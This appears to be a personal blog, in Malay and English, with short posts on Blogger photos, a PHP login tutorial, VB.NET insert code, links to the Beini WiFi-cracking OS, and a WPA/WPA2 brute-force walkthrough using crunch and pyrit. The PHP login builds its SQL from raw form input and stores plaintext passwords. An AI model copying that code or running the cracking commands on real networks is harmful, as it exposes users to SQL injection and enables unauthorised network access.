Wednesday 7 August 2013

Cara nak tengok gambar yg suda diupload dalam blogger

Dimana gambar blogger atau blogspot disimpan?
Bagaimana untuk tengok gambar yg suda diupload?
pertama pergi ke www.google.com SIGN IN akaun google anda
Kemudian Klik More dan Klik Photos 

Disinilah gambar-gambar disimpan
Anda juga boleh padam gambar-gambar yang diupload dalam blogger

Thursday 1 August 2013

PHP simple login system with session

Step 1 : Create database

You should already create database name. then create table name Users
You can create from phpmysql or other tools.

Sql Code
CREATE TABLE `users` (
  `ID` int(2) NOT NULL AUTO_INCREMENT,
  `Fullname` varchar(32) NOT NULL,
  `Username` varchar(32) NOT NULL,
  `Password` varchar(32) NOT NULL,
  PRIMARY KEY (`ID`)
)

Step 2 :  Create php file 

Create file name database.php, login.php  and login_success.php on your directory


Step 3 :  php code database connection

database.php
<?php
$dbhost = "localhost"; 
$dbuser = "root"; //your username database
$dbpass = ""; //Your password database
$dbname = "test"; //Your database name

$dblink = mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
mysql_select_db($dbname) or die(mysql_error());
?>

Step 4 : login code and html form

<?php 
session_start();
include("database.php");
if(isset($_POST['login'])){
 $username = $_POST['username'];
 $password = $_POST['password'];
 if(!empty($username) && !empty($password)){ //Username and password must filled
  $sql_login ="SELECT `ID`, `Fullname`, `Username`, `Password` FROM `users` WHERE `Username`='".$username."' AND `Password`='".$password."'";
  $result = mysql_query($sql_login,$dblink);//execute the sql command
  $rows = mysql_fetch_assoc($result);
  
  if($rows['Username'] == $username && $rows['Password'] == $password){ 
   $_SESSION['fullname'] = $rows['Fullname'];
   header('Location: login_success.php');
  }else{ //Wrong username or password
   echo "<script>alert('invalid username or password please try again')</script>";
  }
  mysql_close();
 }else{
  echo "<font color=\"red\">Username and Password field are required</font>";
 }
}
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
</head>
<body>
<div style="width:350px;margin:0 auto;background-color:#0099FF;margin-top:50px;padding:5px;border:1px solid #666">
  <h2>Login</h2>
  <center>
  <form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
    <p>Username
      <input type="text" name="username" maxlength="32" />
    </p>
    <p>Password
      <input type="password" name="password" maxlength="32" />
    </p>
    <p><input type="submit" name="login" value="LOGIN" /></p>
  </form>
  </center>
</div>
</body>
</html>

Step 5 : login_success.php and logout.php code

login_success.php
now create new file name logout.php
logout.php code

Finish now its time to test

before that you need to insert user on your database.
for example
Login form

login successful

Tuesday 16 July 2013

VB.NET Get Identity After Insert Query

Get the identify or auto number after insert query from ms access database
Example Coding for creating new invoice
  Private Sub CreateInvoiceQuery()
        Dim InsertCom = Me.InvoiceDataAdapterX.Adapter.InsertCommand
       
            InsertCom.CommandText = "INSERT INTO `invoice` (`date_created`, `customerid`) VALUES (?, ?)"
            
            InsertCom.Parameters(0).Value = CType(Me.DateTimePicker1.Value, Date)
            InsertCom.Parameters(1).Value = 1
            InsertCom.Connection.Open()
            InsertCom.ExecuteNonQuery()
            InsertCom.CommandText = "SELECT @@IDENTITY"
            invoice_id = InsertCom.ExecuteScalar
            NoInvoiceTextBox.Text = invoice_id.ToString("D6")
            InsertCom.Connection.Close()
            InsertCom.Dispose()
      
        Debug.WriteLine(invoice_id.ToString)
    End Sub 

Sunday 2 September 2012

Beini download link version 1.2.1-3

BEINI
Beini adalah Operating System berasaskan Tiny Core Linux, Operating System ini digunakan untuk mendapatkan password WiFi yang menggunakan Encryption Wired Equivalent Privacy (WEP) dan juga WPA/WPA2
  1. Beini-1.2.5 the latest version Download
  2. Beini-1.2.3 Download <= password "A87sj8Ab98"
  3. beini-1.2.2 Download
  4. beini-1.2.1 Download

Friday 18 November 2011

Crack wpa/wpa2 without dictionary or wordlist


Install this first:
root@ubuntu:~# apt-get install subversion python-dev libssl-dev zlib1g-dev

Requirements:
ESSID = "test" and passwd = "biscotte"

command: crunch 8 8 abcdefghijklmnopqrstuvwxyz -t bisco@@@ | pyrit -r wpa.cap -e test -i - attack_passthrough
Terminal
root@ubuntu:~# crunch 8 8 abcdefghijklmnopqrstuvwxyz -t bisco@@@ | pyrit -r wpa.cap -e test -i - attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'wpa.cap' (1/1)...
Parsed 5 packets (5 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:0d:93:eb:b0:8c automatically...
Tried 17578 PMKs so far; 434 PMKs per second.

The password is 'biscotte'.

 

Recent Posts

ping busuk

Pingje

HarryD Blog © 2013. All Rights Reserved | Back To Top